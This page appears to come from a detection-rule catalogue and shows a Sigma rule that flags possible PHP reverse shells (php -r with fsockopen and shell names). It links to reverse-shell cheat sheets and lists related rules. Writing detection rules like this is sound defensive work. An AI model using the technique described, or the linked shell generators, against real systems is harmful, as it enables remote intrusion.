Potential PHP Reverse Shell
Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
Sigma rule (View on GitHub)
1title: Potential PHP Reverse Shell
2id: c6714a24-d7d5-4283-a36b-3ffd091d5f7e
3status: test
4description: |
5 Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets.
6 Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
7references:
8 - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
9 - https://www.revshells.com/
10author: '@d4ns4n_'
11date: 2023-04-07
12tags:
13 - attack.execution
14logsource:
15 category: process_creation
16 product: linux
17detection:
18 selection:
19 Image|contains: '/php'
20 CommandLine|contains|all:
21 - ' -r '
22 - 'fsockopen'
23 CommandLine|contains:
24 - 'ash'
25 - 'bash'
26 - 'bsh'
27 - 'csh'
28 - 'ksh'
29 - 'pdksh'
30 - 'sh'
31 - 'tcsh'
32 - 'zsh'
33 condition: selection
34falsepositives:
35 - Unknown
36level: high
References
-
If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new accou...
Read More -
Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.
Read More
Related rules
- AADInternals PowerShell Cmdlets Execution - ProccessCreation
- AADInternals PowerShell Cmdlets Execution - PsScript
- AMSI Bypass Pattern Assembly GetType
- APT29 2018 Phishing Campaign CommandLine Indicators
- AWS EC2 Startup Shell Script Change